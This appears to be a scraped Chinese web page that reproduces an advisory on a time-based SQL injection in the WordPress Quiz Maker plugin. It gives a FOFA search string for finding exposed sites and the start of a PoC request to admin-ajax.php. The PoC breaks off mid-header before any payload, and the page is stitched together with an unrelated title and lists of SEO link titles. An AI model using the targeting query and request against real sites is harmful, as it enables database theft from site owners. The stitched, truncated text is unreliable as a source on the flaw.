当前位置: 首页 > news >正文

建立网站官网网络厂商有哪些

建立网站官网,网络厂商有哪些,共享充电宝开发,明月浩空WordPress0x01 产品简介 WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题…

0x01 产品简介

WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题以及匹配题,让测验更加多样化和全面,适合各种规模和需求的网站使用。

0x02 漏洞概述

WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞,漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足,使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询,从而可能从数据库中提取敏感信息。

0x03 影响范围

Quiz Maker <= 6.5.8.3

0x04 复现环境

FOFA:"/wp-content/plugins/quiz-maker/"

0x05 漏洞复现

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
http://www.yayakq.cn/news/789461/

相关文章:

  • 做网站需要什么简要叙述如何规划建设一个企业网站
  • 国内做设计的网站建设凡科建站的应用场景
  • 济南网站建设哪家专业展示型外贸网站建设
  • 网站开发工具介绍企业网站php源码
  • 中山做网站费用网站建设推广运营
  • 中山市建设局网站视频模板免费制作
  • 徐州建站服务电子商务网站策划 ppt
  • 视频网站开发公司最近热点新闻大事件
  • 甘肃建设厅职称查询官方网站网站模板怎么弄
  • 一个合格的网站设计如何利用dw建设网站
  • 做阿里巴巴网站需要哪些资料wordpress授权代码
  • 郑州网站优化seo网站手机版二维码怎么做
  • 门户类网站有哪些迅雷资源做下载网站
  • 网站如何做谷歌推广优势网网站
  • h5手机网站源码下载做网站毕业设计能过吗
  • 策划书模板免费下载的网站网络推广培训学费几万
  • 杭州的网站建设公司开一个做网站的公司
  • 网站开发与设计500强公司搜索引擎网站建设
  • 上海做网站品牌影盟自助网站建设
  • 网站建设项目设计表安徽搜索引擎推广平台
  • 山东移动网站建设网站上的链接怎么做
  • 网站有哪些区别是什么意思企业cms建站系统
  • 通辽建设公司网站百度搜索风云榜小说排行榜
  • 四川城乡住房和城乡建设厅网站首页龙岗在线网站建设
  • 2015年做哪个网站能致富广渠门网站建设
  • 国外做伞的品牌网站wordpress 替换 插件
  • 陕西住房和城乡建设厅中心网站建设积分兑换官方网站
  • 山东省机关建设网站软件开发网站建设科技有限公司
  • 成都网站制作公司科蓝架设网站是自己架设服务器还是租服务器
  • 上海建设监理协会网站深圳展厅设计企业展厅